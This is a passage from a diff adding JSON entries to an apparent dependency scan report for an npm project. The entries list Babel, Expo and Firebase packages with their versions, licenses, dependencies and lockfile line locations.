[ + "@babel/code-frame@7.27.1", + "@babel/parser@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 2068, + "EndLine": 2081 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/traverse@7.28.4", + "Name": "@babel/traverse", + "Identifier": { + "PURL": "pkg:npm/%40babel/traverse@7.28.4", + "UID": "400d8c03bc57c98b" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/generator@7.28.3", + "@babel/helper-globals@7.28.0", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/types@7.28.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 2082, + "EndLine": 2099 + }, + { + "StartLine": 2100, + "EndLine": 2118 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/types@7.28.4", + "Name": "@babel/types", + "Identifier": { + "PURL": "pkg:npm/%40babel/types@7.28.4", + "UID": "a98ce057aa2f88cf" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-string-parser@7.27.1", + "@babel/helper-validator-identifier@7.27.1" + ], + "Locations": [ + { + "StartLine": 2119, + "EndLine": 2131 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@callstack/react-theme-provider@3.0.9", + "Name": "@callstack/react-theme-provider", + "Identifier": { + "PURL": "pkg:npm/%40callstack/react-theme-provider@3.0.9", + "UID": "7ed581511605e761" + }, + "Version": "3.0.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "deepmerge@3.3.0", + "hoist-non-react-statics@3.3.2", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 2139, + "EndLine": 2151 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@craftzdog/react-native-buffer@6.1.1", + "Name": "@craftzdog/react-native-buffer", + "Identifier": { + "PURL": "pkg:npm/%40craftzdog/react-native-buffer@6.1.1", + "UID": "952be585b112c9d" + }, + "Version": "6.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ieee754@1.2.1", + "react-native-quick-base64@2.2.2" + ], + "Locations": [ + { + "StartLine": 2161, + "EndLine": 2184 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@egjs/hammerjs@2.0.17", + "Name": "@egjs/hammerjs", + "Identifier": { + "PURL": "pkg:npm/%40egjs/hammerjs@2.0.17", + "UID": "8da3564581409f49" + }, + "Version": "2.0.17", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/hammerjs@2.0.46" + ], + "Locations": [ + { + "StartLine": 2195, + "EndLine": 2206 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@expo/config-plugins@10.1.2", + "Name": "@expo/config-plugins", + "Identifier": { + "PURL": "pkg:npm/%40expo/config-plugins@10.1.2", + "UID": "b4b1c72b0008b762" + }, + "Version": "10.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@expo/config-types@53.0.5", + "@expo/json-file@9.1.5", + "@expo/plist@0.3.5", + "@expo/sdk-runtime-versions@1.0.0", + "chalk@4.1.2", + "debug@4.4.3", + "getenv@2.0.0", + "glob@10.4.5", + "resolve-from@5.0.0", + "semver@7.7.3", + "slash@3.0.0", + "slugify@1.6.6", + "xcode@3.0.1", + "xml2js@0.6.0" + ], + "Locations": [ + { + "StartLine": 2307, + "EndLine": 2328 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@expo/config-types@53.0.5", + "Name": "@expo/config-types", + "Identifier": { + "PURL": "pkg:npm/%40expo/config-types@53.0.5", + "UID": "525fccba8d91f264" + }, + "Version": "53.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2370, + "EndLine": 2375 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@expo/json-file@9.1.5", + "Name": "@expo/json-file", + "Identifier": { + "PURL": "pkg:npm/%40expo/json-file@9.1.5", + "UID": "12e257308098e77f" + }, + "Version": "9.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.10.4", + "json5@2.2.3" + ], + "Locations": [ + { + "StartLine": 2376, + "EndLine": 2385 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@expo/plist@0.3.5", + "Name": "@expo/plist", + "Identifier": { + "PURL": "pkg:npm/%40expo/plist@0.3.5", + "UID": "d9acffe9664f9003" + }, + "Version": "0.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@xmldom/xmldom@0.8.11", + "base64-js@1.5.1", + "xmlbuilder@15.1.1" + ], + "Locations": [ + { + "StartLine": 2395, + "EndLine": 2405 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@expo/sdk-runtime-versions@1.0.0", + "Name": "@expo/sdk-runtime-versions", + "Identifier": { + "PURL": "pkg:npm/%40expo/sdk-runtime-versions@1.0.0", + "UID": "3393e524bba94941" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2406, + "EndLine": 2411 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/ai@2.2.1", + "Name": "@firebase/ai", + "Identifier": { + "PURL": "pkg:npm/%40firebase/ai@2.2.1", + "UID": "236918d0f6811e9c" + }, + "Version": "2.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/app-types@0.9.3", + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2412, + "EndLine": 2431 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/analytics@0.10.18", + "Name": "@firebase/analytics", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics@0.10.18", + "UID": "329808fa1311b76d" + }, + "Version": "0.10.18", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2438, + "EndLine": 2453 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/analytics-compat@0.2.24", + "Name": "@firebase/analytics-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics-compat@0.2.24", + "UID": "62d0873dd6cba61a" + }, + "Version": "0.2.24", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/analytics-types@0.8.3", + "@firebase/analytics@0.10.18", + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2454, + "EndLine": 2469 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/analytics-types@0.8.3", + "Name": "@firebase/analytics-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics-types@0.8.3", + "UID": "9acd93cfb92624c" + }, + "Version": "0.8.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2476, + "EndLine": 2481 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app@0.14.2", + "Name": "@firebase/app", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app@0.14.2", + "UID": "b374661166fc2974" + }, + "Version": "0.14.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2488, + "EndLine": 2503 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-check@0.11.0", + "Name": "@firebase/app-check", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check@0.11.0", + "UID": "7fce5d28eb91edfd" + }, + "Version": "0.11.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2504, + "EndLine": 2521 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-check-compat@0.4.0", + "Name": "@firebase/app-check-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-compat@0.4.0", + "UID": "750143c3137c3a0b" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-types@0.5.3", + "@firebase/app-check@0.11.0", + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2522, + "EndLine": 2541 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-check-interop-types@0.3.3", + "Name": "@firebase/app-check-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.3", + "UID": "8b66c65b56b052ce" + }, + "Version": "0.3.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2548, + "EndLine": 2553 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-check-types@0.5.3", + "Name": "@firebase/app-check-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-types@0.5.3", + "UID": "fe0202c0da0554f1" + }, + "Version": "0.5.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2554, + "EndLine": 2559 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-compat@0.5.2", + "Name": "@firebase/app-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-compat@0.5.2", + "UID": "5c86d0dd51218021" + }, + "Version": "0.5.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2566, + "EndLine": 2581 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-types@0.9.3", + "Name": "@firebase/app-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-types@0.9.3", + "UID": "4b18d07362b45a02" + }, + "Version": "0.9.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2588, + "EndLine": 2593 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/auth@1.11.0", + "Name": "@firebase/auth", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth@1.11.0", + "UID": "763b6929ff578f6b" + }, + "Version": "1.11.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "@react-native-async-storage/async-storage@1.24.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2600, + "EndLine": 2623 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/auth-compat@0.6.0", + "Name": "@firebase/auth-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-compat@0.6.0", + "UID": "d768692825181e7e" + }, + "Version": "0.6.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/auth-types@0.13.0", + "@firebase/auth@1.11.0", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2624, + "EndLine": 2642 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/auth-interop-types@0.2.4", + "Name": "@firebase/auth-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.4", + "UID": "8566cf44cee9df15" + }, + "Version": "0.2.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2649, + "EndLine": 2654 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/auth-types@0.13.0", + "Name": "@firebase/auth-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-types@0.13.0", + "UID": "c28eaba81f4962a3" + }, + "Version": "0.13.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 2655, + "EndLine": 2664 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/component@0.7.0", + "Name": "@firebase/component", + "Identifier": { + "PURL": "pkg:npm/%40firebase/component@0.7.0", + "UID": "d3413c4e531a76d2" + }, + "Version": "0.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2671, + "EndLine": 2683 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/data-connect@0.3.11", + "Name": "@firebase/data-connect", + "Identifier": { + "PURL": "pkg:npm/%40firebase/data-connect@0.3.11", + "UID": "5f1ab1e1e8adcafe" + }, + "Version": "0.3.11", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2690, + "EndLine": 2705 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database@1.1.0", + "Name": "@firebase/database", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database@1.1.0", + "UID": "3c171ddc1d65f9cc" + }, + "Version": "1.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "faye-websocket@0.11.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2712, + "EndLine": 2729 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database-compat@2.1.0", + "Name": "@firebase/database-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-compat@2.1.0", + "UID": "616db2e3a065c6cf" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/database-types@1.0.16", + "@firebase/database@1.1.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2730, + "EndLine": 2746 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database-types@1.0.16", + "Name": "@firebase/database-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-types@1.0.16", + "UID": "89ea169e13cf85ec" + }, + "Version": "1.0.16", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 2753, + "EndLine": 2762 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/firestore@4.9.1", + "Name": "@firebase/firestore", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore@4.9.1", + "UID": "c9e252d5fe4f57d6" + }, + "Version": "4.9.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "@firebase/webchannel-wrapper@1.0.4", + "@grpc/grpc-js@1.9.15", + "@grpc/proto-loader@0.7.15", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2769, + "EndLine": 2789 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/firestore-compat@0.4.1", + "Name": "@firebase/firestore-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore-compat@0.4.1", + "UID": "9bea3f707d961720" + }, + "Version": "0.4.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/firestore-types@3.0.3", + "@firebase/firestore@4.9.1", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2790, + "EndLine": 2808 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/firestore-types@3.0.3", + "Name": "@firebase/firestore-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore-types@3.0.3", + "UID": "80a9cdf15fe6c08a" + }, + "Version": "3.0.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 2815, + "EndLine": 2824 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/functions@0.13.1", + "Name": "@firebase/functions", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions@0.13.1", + "UID": "972963dfd8833615" + }, + "Version": "0.13.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/app@0.14.2", + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/messaging-interop-types@0.2.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2831, + "EndLine": 2850 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/functions-compat@0.4.1", + "Name": "@firebase/functions-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions-compat@0.4.1", + "UID": "efaa47feecfd80f0" + }, + "Version": "0.4.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/functions-types@0.6.3", + "@firebase/functions@0.13.1", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2851, + "EndLine": 2869 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/functions-types@0.6.3", + "Name": "@firebase/functions-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions-types@0.6.3", + "UID": "245e59a14b88e3fb" + }, + "Version": "0.6.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2876, + "EndLine": 2881 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/installations@0.6.19", + "Name": "@firebase/installations", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations@0.6.19", + "UID": "7e4e9b32ee61208c" + }, + "Version": "0.6.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2888, + "EndLine": 2902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/installations-compat@0.2.19", + "Name": "@firebase/installations-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations-compat@0.2.19", + "UID": "a6df8e5f7e1b6c2" + }, + "Version": "0.2.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/installations-types@0.5.3", + "@firebase/installations@0.6.19", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2903, + "EndLine": 2918 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/installations-types@0.5.3", + "Name": "@firebase/installations-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations-types@0.5.3", + "UID": "25dff3fa4d6d55b5" + }, + "Version": "0.5.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3" + ], + "Locations": [ + { + "StartLine": 2925, + "EndLine": 2933 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/logger@0.5.0", + "Name": "@firebase/logger", + "Identifier": { + "PURL": "pkg:npm/%40firebase/logger@0.5.0", + "UID": "6ce41b2e88446fc6" + }, + "Version": "0.5.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2940, + "EndLine": 2951 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/messaging@0.12.23", + "Name": "@firebase/messaging", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging@0.12.23", + "UID": "84e92c96e2abe5ed" + }, + "Version": "0.12.23", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/messaging-interop-types@0.2.3", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2958, + "EndLine": 2974 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/messaging-compat@0.2.23", + "Name": "@firebase/messaging-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging-compat@0.2.23", + "UID": "836d15cc3753579b" + }, + "Version": "0.2.23", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/messaging@0.12.23", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2975, + "EndLine": 2989 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/messaging-interop-types@0.2.3", + "Name": "@firebase/messaging-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging-interop-types@0.2.3", + "UID": "36477b6f17353f93" + }, + "Version": "0.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2996, + "EndLine": 3001 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/performance@0.7.9", + "Name": "@firebase/performance", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance@0.7.9", + "UID": "e4d672b4047a01ec" + }, + "Version": "0.7.9", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1", + "web-vitals@4.2.4" + ], + "Locations": [ + { + "StartLine": 3008, + "EndLine": 3024 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/performance-compat@0.2.22", + "Name": "@firebase/performance-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance-compat@0.2.22", + "UID": "23d29551638b3ac" + }, + "Version": "0.2.22", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/performance-types@0.2.3", + "@firebase/performance@0.7.9", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3025, + "EndLine": 3041 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/performance-types@0.2.3", + "Name": "@firebase/performance-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance-types@0.2.3", + "UID": "4f28b81b7e90e6b" + }, + "Version": "0.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3048, + "EndLine": 3053 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/remote-config@0.6.6", + "Name": "@firebase/remote-config", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config@0.6.6", + "UID": "5fbe1b0ef0568f39" + }, + "Version": "0.6.6", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3060, + "EndLine": 3075 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/remote-config-compat@0.2.19", + "Name": "@firebase/remote-config-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config-compat@0.2.19", + "UID": "af2e92f4a0453c1c" + }, + "Version": "0.2.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/remote-config-types@0.4.0", + "@firebase/remote-config@0.6.6", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3076, + "EndLine": 3092 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/remote-config-types@0.4.0", + "Name": "@firebase/remote-config-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config-types@0.4.0", + "UID": "74803f2cfea8db7b" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3099, + "EndLine": 3104 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/storage@0.14.0", + "Name": "@firebase/storage", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage@0.14.0", + "UID": "f6e2fd12c92bc7bf" + }, + "Version": "0.14.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3111, + "EndLine": 3127 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/storage-compat@0.4.0", + "Name": "@firebase/storage-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage-compat@0.4.0", + "UID": "33cf5626753d281a" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-compat@0.5.2", + "@firebase/component@0.7.0", + "@firebase/storage-types@0.8.3", + "@firebase/storage@0.14.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3128, + "EndLine": 3146 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/storage-types@0.8.3", + "Name": "@firebase/storage-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage-types@0.8.3", + "UID": "f48ff3e89e0f72ab" + }, + "Version": "0.8.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 3153, + "EndLine": 3162 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/util@1.13.0", + "Name": "@firebase/util", + "Identifier": { + "PURL": "pkg:npm/%40firebase/util@1.13.0", + "UID": "db825f66051b276d" + }, + "Version": "1.13.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 3169, + "EndLine": 3181 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/webchannel-wrapper@1.0.4", + "Name": "@firebase/webchannel-wrapper", + "Identifier": { + "PURL": 